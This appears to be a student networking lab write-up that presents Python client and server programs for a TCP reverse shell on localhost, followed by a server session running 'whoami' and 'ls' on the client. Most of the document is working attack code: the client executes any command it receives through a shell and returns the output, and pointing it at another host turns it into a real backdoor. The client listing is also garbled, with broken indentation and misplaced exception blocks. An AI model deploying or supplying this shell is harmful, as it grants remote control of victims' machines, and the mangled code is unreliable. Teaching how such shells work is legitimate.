

## EXPT: 9 DEVELOP A PROGRAM TO CREATE REVERSE SHELL USING TCP SOCKETS

### Aim :

Demonstrate basic TCP communication and remote command execution between two Python programs.

### Algorithm :

1. Server: listen on a port, accept a client, read commands from the user, send commands to client, print responses.
2. Client: connect to server, receive commands, if cd then change directory, otherwise run the command, send back output and current directory.
3. On quit close the connection.

### Code :

#### **Client :**

```
import socket
import subprocess
import os
host = '127.0.0.1'
port = 9999
def connect_to_server():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    while True:
        try:
            command = client.recv(1024).decode()
            if command.lower() == 'quit':
                break
            elif command.startswith('cd '):
                try:
                    os.chdir(command[3:].strip())
```

```

        output = f'Changed directory to {os.getcwd()}'
    except Exception as e:
        output = str(e)
    else:
        process = subprocess.Popen(command, shell=True,
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = process.stdout.read() + process.stderr.read()
        output = output.decode()
        current_dir = os.getcwd() + "> "
        client.send((output + "\n" + current_dir).encode())
    except Exception as e:
        client.send(str(e).encode())
        break
    client.close()
if __name__ == "__main__":
    connect_to_server()

```

**Server :**

```

import socket
import threading
host = '127.0.0.1'
port = 9999
def create_server_socket():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, port))
    server.listen(5)
    print(f"[+] Listening on {host}:{port}")
    return server
def handle_client(conn, addr):
    print(f"[+] Connection established with {addr[0]}:{addr[1]}")
    while True:
        try:

```

```
        command = input(f'{addr[0]}@shell> ')
        if command.lower() == 'quit':
            conn.send(command.encode())
            conn.close()
            break
        if command.strip():
            conn.send(command.encode())
            response = conn.recv(4096).decode()
            print(response)
    except Exception as e:
        print(f'[!] Error: {e}')
        conn.close()
        break

def start_server():
    server = create_server_socket()
    while True:
        conn, addr = server.accept()
        client_thread = threading.Thread(target=handle_client, args=(conn,
addr))
        client_thread.start()

if __name__ == "__main__":
    start_server()
```

---

Output :

Server :

```
~/CN/rev-shell
> python server.py
[+] Listening on 127.0.0.1:9999
[+] Connection established with 127.0.0.1:38674
127.0.0.1@shell> whoami
s31zur3

/home/s31zur3/CN/rev-shell>
127.0.0.1@shell> ls -lah
total 16K
drwxr-xr-x. 2 s31zur3 s31zur3 4.0K Nov 18 11:05 .
drwxr-xr-x. 9 s31zur3 s31zur3 4.0K Nov 18 11:03 ..
-rw-r--r--. 1 s31zur3 s31zur3 1.3K Nov 18 11:04 client.py
-rw-r--r--. 1 s31zur3 s31zur3 1.2K Nov 18 11:05 server.py

/home/s31zur3/CN/rev-shell>
127.0.0.1@shell> █
```

Client :

```
~/CN/rev-shell
> python client.py
█
```

Result :

Server shows a “connection established” message when client connects. Commands typed at the server prompt run on the client and their output appears on the server. `cd` changes the client's directory and the new path is returned. `Quit` ends the session; errors close the connection.